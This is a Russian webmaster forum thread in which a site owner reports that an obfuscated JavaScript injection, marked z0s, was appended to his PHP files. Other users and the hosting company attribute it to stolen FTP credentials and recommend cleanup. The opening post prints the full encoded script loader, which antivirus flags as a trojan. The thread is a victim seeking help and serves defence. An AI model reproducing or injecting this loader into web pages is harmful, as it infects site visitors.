- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня захожу утром на свой мониторинг и форум и вижу следующее:
ошибка в строчках
setcookie($cookiename . '_data', serialize($sessiondata), $current_time + 31536000, $cookiepath, $cookiedomain, $cookiesecure);
это 366 строчка
message_die(CRITICAL_ERROR, 'Error clearing sessions table', '', __LINE__, __FILE__, $sql);
это 483 строчка
В результате нашел в файлах config.php и title.php следующий код:
<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28aS%21%3D1%29%7Bfunction%20VR%28mR%29%7Breturn%20mR%7Dtry%7Bfunction%20AoM%28fWI%29%7Breturn%20parseInt%28fWI%29%7Dvar%20IdC%3D%27LL0LA0Ln0LZ0Lk0Lb0L80L50LR0Lc0L30LS0Ly0Lw0Lq0Lj0L90Lo0Le0LI0Lh0LJ0Ld0LN0Lz0LX0L60LW0Ll0Lx0Lg0Ls0LC0LP0L40LT0LV0Lt0La0LO0LU0L70Lf0Lp0Lr0Lm0LD0LB0LY0LG0LH0LK0LF0LM0AL0AA0An0AZ0Ak0Ab0A80A50AR0Ac0A30AS0Ay0Aw0Aq0Aj0A90Ao0Ae0AI0Ah0AJ0Ad0AN0Az0AX0A6%27%2Ctky%3DVR%28%270%27%29%3Bvar%20BEw%3DArray%286939%5E6997%2CAoM%28%271%27%29%2CAoM%28%2717%27%29%2CAoM%28%270%27%29%2CAoM%28%2727%27%29%2C29503%5E29501%2CAoM%28%276%27%29%2C30923%5E30855%2CAoM%28%2720%27%29%2CAoM%28%277%27%29%2CAoM%28%2728%27%29%2C26396%5E26369%2CAoM%28%2782%27%29%2C645%5E693%2C24849%5E24889%2CAoM%28%2753%27%29%2CAoM%28%2790%27%29%2C19286%5E19283%2CAoM%28%2763%27%29%2CAoM%28%2794%27%29%2CAoM%28%2758%27%29%2C26932%5E26991%2C25118%5E25111%2C21127%5E21123%2C22614%5E22597%2C6890%5E6901%2C17272%5E17217%2C24444%5E24371%2CAoM%28%2723%27%29%2C9671%5E9713%2C13996%5E13999%2CAoM%28%2737%27%29%2CAoM%28%2773%27%29%2C5285%5E5369%2C27671%5E27697%2C4604%5E4585%2CAoM%28%2789%27%29%2CAoM%28%2774%27%29%2C17625%5E17565%2CAoM%28%2770%27%29%2C3323%5E3257%2CAoM%28%2722%27%29%2CAoM%28%2725%27%29%2C10409%5E10489%2CAoM%28%2710%27%29%2CAoM%28%2733%27%29%2CAoM%28%2715%27%29%2CAoM%28%2785%27%29%2C26022%5E26085%2CAoM%28%2734%27%29%2CAoM%28%2743%27%29%2C21757%5E21701%2CAoM%28%2751%27%29%2CAoM%28%2716%27%29%2CAoM%28%278%27%29%2CAoM%28%2730%27%29%2CAoM%28%2736%27%29%2C13990%5E13969%2CAoM%28%2793%27%29%2C29203%5E29193%2CAoM%28%2761%27%29%2CAoM%28%2795%27%29%2CAoM%28%2772%27%29%2C7344%5E7395%2C21654%5E21723%2C24108%5E24079%2C11788%5E11813%2CAoM%28%2744%27%29%2CAoM%28%2775%27%29%2C24696%5E24663%2CAoM%28%2746%27%29%2CAoM%28%2711%27%29%2CAoM%28%2749%27%29%2C29099%5E29139%2CAoM%28%2739%27%29%2CAoM%28%2764%27%29%2C13834%5E13899%2CAoM%28%2771%27%29%2C19082%5E19151%2C22635%5E22623%2C1453%5E1525%29%2CYrL%3Bvar%20Gjk%2Crop%3Bvar%20DBO%3D%27LLLALnLZLkLbL8L5LRLcL3LnL8LkLSL3LyLwLqLjL9LnLoLeLILZLoLhLJLdLyLNLzLZLyLZLXL6LWL3LlLoLyLxLzL8LlL9LJLILyLgLsL3LWLyL3LlLoLyLxLzL8LlL9LJLCLyLgLsL3LPLALlL8L4LkLXLlL9LZLXL6LPLTLlL8L4LkLXLlL9LJLVLtLaLOLULULULULULJLCLyL7LSLnLcLXLlL3L8LPLnLSLSLfLkLlLyLWLyLnLoLeLVLpLWLpLVLlLALnLzLbLlL9LZLoLhLJLVLpLCLlLrLbLkLZLlLALWLpLVLgLsL3LPL8LSLjLeL4LmL8LZLkL3LTL9LJLCLyLDLNLzLZLyLnLbLhLWLBLALYLRLGLoLHLBLCLNLzLZLyLbLKLFLWLBLYLBLILMALLqLWLBLcLbL7LzL8LlLYLPLnAALzLALALkLnL8LlAALPLSLZLTLBLCLNLzLZLyAnLSAZLWLBAkAbL8LXAAAkLBLCLkLRL9L7LSLnLcLXLlL3L8LPLnLSLSLfLkLlLPLkL3L7LlLrA8LRL9LnLbLhLVLBLWLBLVLbLKLFLJLyLWLWA5LYLJLdLNLzLZLyL7AAAbLWL7LSLnLcLXLlL3L8LPAALSLnLzL8LkLSL3LPAbLSLAL8LCLNLzLZLyL4LcLzLWLyLBAbL8LBLVLBL8LbARLBLVLBAkAkLBLVL9LyL7AAAbLyAcLWLyLBLBA3LBLBARASL6AbL9LJLJLyLVLyL7AAAbLPLZLlLbAALzLnLlLyL9AkAyAwLzA5ALLUA5AqLPA5AjAkLILBLPLBLJLPLZLlLbAALzLnLlLyL9AkA9LPLVAkLILBLPLBLJLVLBLPLBLVASL6AbL9LJLyLVLBLPLBLyLVLyLMALLqLVAnLSAZLCLNLzLZLyLmLSLrLWL7LSLnLcLXLlL3L8LPLnLZLlLzL8LlAZAALlLXLlL3L8L9LBLkLRLZLzLXLlLBLJLCLmLSLrLPLALlL8LFL8L8LZLkLMLcL8LlLyL9LBLALZLnLBLILyL4LcLzLJLCLmLSLrLPAbLlLkLTAbL8LWLULCLmLSLrLPLoLkL7L8AbLWLULCLmLSLrLPLRLZLzLXLlLwLSLZL7LlLZLyLWLyLULCLyL8LZAoLdLyL7LSLnLcLXLlL3L8LPLMLSL7AoLPLzLbLbLlL3L7AeAbLkAAL7LyL9LyLmLSLrLJLCLyLwLqLjL9LnLbLhLILyLbLKLFLyLJLCLDLyLnLzL8LnAbL9LlLJLyLdL7LSLnLcLXLlL3L8LPLoLZLkL8LlLyL9LBLLAbL8LXAAL5LLLMLSL7AoL5LLAkLMLSL7AoL5LLAkAbL8LXAAL5LBLJLCLyL7LSLnLcLXLlL3L8LPLMLSL7AoLPLzLbLbLlL3L7AeAbLkAAL7LyL9LyLmLSLrLJLCLwLqLjLyL9LyLnLbLhLILbLKLFLJLyLCLDLyLDAILRLcL3LnL8LkLSL3LyASL6AbL9LJLdLyLNLzLZLyLqLZAhLWAJLOLCLNLzLZLyLsLgLmLWLpLULYAJAdLOANLaAzLtAqLULzLMLnL7LlLRLpLIASAXLjLWLpLpLCLyLRLSLZL9LHLrLmLWLULCLyLHLrLmLyLLLyLqLZAhLCLyLHLrLmLVLVLJLyASAXLjLVLWLyLsLgLmLPLALcLMLAL8LZL9LeLzL8AbLPLRAALSLSLZL9LeLzL8AbLPLZLzL3L7LSLXL9LJA6LsLgLmLPAALlL3LTL8AbLJLILYLILYLJLCLyLZLlL8LcLZL3LyASAXLjLCLyLDLLAkLALnLZLkLbL8L5%27%2CQwd%3D%27%27%3BIdC%3DIdC.split%28tky%29%3Bfor%20%28YrL%3D0%3BYrL%3CDBO.length%3BYrL+%3D2%29%7Brop%3DDBO.substr%28YrL%2C2%29%3Bfor%28Gjk%3D0%3BGjk%3CIdC.length%3BGjk++%29%7Bif%28IdC%5BGjk%5D%3D%3Drop%29break%3B%7DQwd+%3DString.fromCharCode%28BEw%5BGjk%5D%5E114%29%3B%7Ddocument.write%28Qwd%29%3B%7Dcatch%28VJ%29%7B%7D%7Dvar%20aS%3D1%3C/script%3E"))</script><!--[/z0s]-->
Что эта за ерунда, и как она прописалась в файлах в мой запороленный хостинг!?
http://img84.imageshack.us/img84/1331/kasperem7.gif
вот скрин вторая строчка - пользователь форума прислал.
что с моим первым сообщением?
в первом сообщение была описана проблема появления во всех файлах на хостинге кода <!--[z0s]--><script>document.write(unescape ... всякие разные символы
JS.Remora.w - это троян со скрины, кто виноват в такой ситуации?
о каком форуме речь то? Поясните подробнее пока вопрос не ясен
kartrid
Или троян попал на сам хостинг и там бегает, или украли доступ от FTP и записали троянчик.
думаю, у вас сперли пароли от ФТП.
чистите винду, потом меняйте пароли, потом удаляйте этот эскплоит.
Новый шустрый вирус уже успел заразить кучу сайтов, смотрим http://www.google.com/search?q=z0s
У меня в один инетмагаз пролез (не знаю как) - чистили руками кучу файла
Сколько не искал в инете как пролазит в хост - не нашёл...
Вот ответ администрации хостинга:
Добрый день.
Да, это код вируса.
Мы советуем прочитать статью - http://jino.ru/support/manuals/security.html
Настоятельно рекомендуем изменить все пароли от аккаунта, а также обновить свое программное обеспечение. Проверьте файлы сайта на наличие вирусов. И будьте внимательны в будущем.
--
С уважением,
Долгополов Александр Александрович
Хостинг «Джино»
forum.hackzona.net
hackzona.net
вот о чем вообще идет речь
Да в результате пришлось перелопатить большинство *.php
Найти их было легко - они были изменены сегодня, во всех файлах в конце был дописан вредоностный код, вот что выдавал КАСперский
http://forum.hackzona.net/viewforum.php?f62&sid=ab140182c7948c8c8502436dafbabb3
JS.Remora.w
Вообщем хотелось бы услышать от профи - в чем причина и как избежать этого впредь.
Пароли настолько многоэтажные что залезть на хостинг ну никак не могли.